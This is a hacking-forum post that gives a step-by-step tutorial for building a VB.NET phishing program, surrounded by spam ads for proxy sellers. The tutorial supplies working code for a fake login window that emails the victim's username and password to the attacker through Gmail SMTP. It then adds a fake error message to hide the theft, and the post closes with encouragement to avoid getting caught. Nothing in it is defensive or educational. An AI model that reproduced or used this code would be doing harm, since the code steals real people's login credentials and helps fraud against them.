Vip-----Munde
Would you like to react to this message? Create an account in a few clicks or log in to continue.

Vip-----Munde

Jai Mata Di
 
HomeLatest imagesRegisterLog in
Welcome Dear Users Please Make Your First Post In Introdcution Section and Enjoy the forum
Search
 
 

Display results as :
 
Rechercher Advanced Search
Latest topics
» [Vn5socks.net] Auto update 24/7 - Good socks 8h00 PM
How to make a phisher in VB.NET EmptySat Dec 01, 2018 7:57 pm by vn5socks.net

» [Shopsocks5.com] Service Socks5 Cheap - 19h40
How to make a phisher in VB.NET EmptySat Dec 01, 2018 7:42 pm by shopsocks5.com

» [Vn5socks.net] Auto update 24/7 - Good socks 4h25 PM
How to make a phisher in VB.NET EmptySat Dec 01, 2018 4:25 pm by vn5socks.net

» [Shopsocks5.com] Service Socks5 Cheap - 16h10
How to make a phisher in VB.NET EmptySat Dec 01, 2018 4:10 pm by shopsocks5.com

» [Vn5socks.net] Auto update 24/7 - Good socks 8h40 AM
How to make a phisher in VB.NET EmptySat Dec 01, 2018 8:45 am by vn5socks.net

» [Shopsocks5.com] Service Socks5 Cheap - 8h25
How to make a phisher in VB.NET EmptySat Dec 01, 2018 8:25 am by shopsocks5.com

» [DICHVUSOCKS.US] 12h05 AM UPDATE 24/24- Good Socks
How to make a phisher in VB.NET EmptySat Dec 01, 2018 12:01 am by dichvusocks

» [DICHVUSOCKS.US] 23h15 PM UPDATE 24/24- Good Socks
How to make a phisher in VB.NET EmptyFri Nov 30, 2018 11:35 pm by dichvusocks

» [Vn5socks.net] Auto update 24/7 - Good socks 11h35 PM
How to make a phisher in VB.NET EmptyFri Nov 30, 2018 11:34 pm by vn5socks.net

Top posters
vn5socks.net
How to make a phisher in VB.NET I_vote_lcapHow to make a phisher in VB.NET I_voting_barHow to make a phisher in VB.NET I_vote_rcap 
dichvusocks
How to make a phisher in VB.NET I_vote_lcapHow to make a phisher in VB.NET I_voting_barHow to make a phisher in VB.NET I_vote_rcap 
shopsocks5.com
How to make a phisher in VB.NET I_vote_lcapHow to make a phisher in VB.NET I_voting_barHow to make a phisher in VB.NET I_vote_rcap 
tisocks
How to make a phisher in VB.NET I_vote_lcapHow to make a phisher in VB.NET I_voting_barHow to make a phisher in VB.NET I_vote_rcap 
____H-E-A-R-T____
How to make a phisher in VB.NET I_vote_lcapHow to make a phisher in VB.NET I_voting_barHow to make a phisher in VB.NET I_vote_rcap 
___devils____
How to make a phisher in VB.NET I_vote_lcapHow to make a phisher in VB.NET I_voting_barHow to make a phisher in VB.NET I_vote_rcap 
***__яiCh_M@N ™__***
How to make a phisher in VB.NET I_vote_lcapHow to make a phisher in VB.NET I_voting_barHow to make a phisher in VB.NET I_vote_rcap 
™12.-.@.-.j.-.@™
How to make a phisher in VB.NET I_vote_lcapHow to make a phisher in VB.NET I_voting_barHow to make a phisher in VB.NET I_vote_rcap 
__Tigeя™__
How to make a phisher in VB.NET I_vote_lcapHow to make a phisher in VB.NET I_voting_barHow to make a phisher in VB.NET I_vote_rcap 
a-x-n
How to make a phisher in VB.NET I_vote_lcapHow to make a phisher in VB.NET I_voting_barHow to make a phisher in VB.NET I_vote_rcap 
Most active topics
Jokes In Hindi Funny
[Vn5socks.net] Service Seller Socks Good
Scanned Idz for Cracking
28 August 2011
Hotfile Premium Accounts
26 August 2011
30 August 2011
28 August 2011
29 August 2011
Show Your Cracking Hits
Most Viewed Topics
26 april 2012
23 Aug VIP Http
[Shopsocks5.com] Service Socks5 Cheap - 19h50
PROXIES SOCKS PROXY LIST 20h31 PM BY TISOCKS.NET
PROXIES SOCKS PROXY LIST 20h31 PM BY TISOCKS.NET
14 april 2012
28 april 2012
PROXIES SOCKS PROXY LIST 20h25 PM BY TISOCKS.NET
07 nov.2011
28 August 2011
Top posting users this month
No user

 

 How to make a phisher in VB.NET

Go down 
AuthorMessage
__Dj_-k1ll3r__
Super Moderator
Super Moderator
__Dj_-k1ll3r__


Posts : 63
Points : 187
Reputation : 0
Join date : 2011-07-18

How to make a phisher in VB.NET Empty
PostSubject: How to make a phisher in VB.NET   How to make a phisher in VB.NET EmptyFri Jul 29, 2011 12:59 pm

This tutorial will explain how to make a phishing program using Visual Basic .NET.

First things first, you will need to create a new project and name it whatever you want. In this example I will name it MyFirstPhisher.


How to make a phisher in VB.NET NewProject


For the interface, you will need to add: 2 labels, 2 text boxes, and 1 button. Incase this is your first time using VB, you can accomplish this by clicking and dragging these items from the toolbox to your application.


How to make a phisher in VB.NET Items

At this point you should have something that looks like this:

How to make a phisher in VB.NET Example1


Now you want to change the text of the labels and the button to say 'Username', 'Password', and 'Login'. At this time it would also be a good idea to change the title of your application. You can do this by changing the 'Text' property in the properties window.




Now you should have something that looks like this:


How to make a phisher in VB.NET Example2


Congrats! You have now made the interface for your phisher!


Now on to the more technical part, the coding.

I'm not gonna go through and explain every line, but most of it should be pretty self-explanitory what its doing.

So what you will first need to do is double click the login button that you made, which should bring up a screen that looks like this:


[URL="https://2img.net/h/i152.photobucket.com/albums/s174/rockbomb/PhishingTut/CodingScreen.png"]https://2img.net/h/i152.photobucket.com/albums/s...dingScreen.png[/URL]


This is the screen where you will be doing all of the coding for your project.


To explain a little about what we're going to do with the code, we are going to set this up to send you an email containing the victim's username and password. In order to do that, we have to set up a new email message, and then establish a connection to google's SMTP server (You can use a different SMTP server if you wish, but for this tutorial I will be using Gmail.)

Here's the code we're going to be using:
Quote: Imports System.Net.Mail
Public Class Form1

Private Sub Button1_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Button1.Click

Button1(start button):

If TextBox1.Text = "" Then
[/SIZE] [SIZE=4]
MsgBox("Username Is Missing")
If TextBox2.Text = "" Then
MsgBox("Password Is Missing")
Else
End If
End If
Dim smtpServer As New SmtpClient()
Dim mail As New MailMessage()
smtpServer.Credentials = New Net.NetworkCredential("Your Gmail", "Your Gmail Password")
'using gmail
smtpServer.Port = 587
smtpServer.Host = "smtp.gmail.com"
smtpServer.EnableSsl = True
mail = New MailMessage()
mail.From = New MailAddress("Your Gmail")
mail.To.Add("Your Gmail")
mail.Subject = "Username: " & TextBox1.Text
mail.Body = "Username : " & TextBox1.Text & ", " & "Password : " & TextBox2.Text
smtpServer.Send(mail)
MsgBox("Disconnected From Server, Please try again later!")



End Sub
You will need to enter your gmail account information where is says 'YourEmailHere@gmail.com' and 'YourPasswordGoesHere'.

You now have a working phisher, go ahead and click the debug button and try it out!

How to make a phisher in VB.NET Debug

We're not done though, theres one more thing we are going to cover in this tutorial. To add a little realism to your program, we're going to add a fake error message. To do that we're going to enter the following code after the "SMTPServer.Send(mymailmessage)" line:


MsgBox("Insert your error message here.")
You can change the text in between the quotes to whatever you want.
Your coding screen should now look like this:


And thats it! You now have a fully functioning phishing program!rquoise]
Now obviously you can't send this to somebody as-is and expect them to put any kind of user/pass in there, so you will need to add graphics and other stuff to make it a convincible program.

Hope this tutorial helps, have fun and don't get caught!


Added By Biron
Back to top Go down
 
How to make a phisher in VB.NET
Back to top 
Page 1 of 1
 Similar topics
-
» Bitcoin Stealer - Now Make Thousand Of Money Easily {HOT} {TESTED}
» Funny "make-up" tutorial
» Make: Arduino Bots and Gadgets
» ___How To Make A Basic Website Using HTML___
» _____How to hide and make an invisible folder _____

Permissions in this forum:You cannot reply to topics in this forum
Vip-----Munde :: PC Related :: Hackers' Lounge-
Jump to: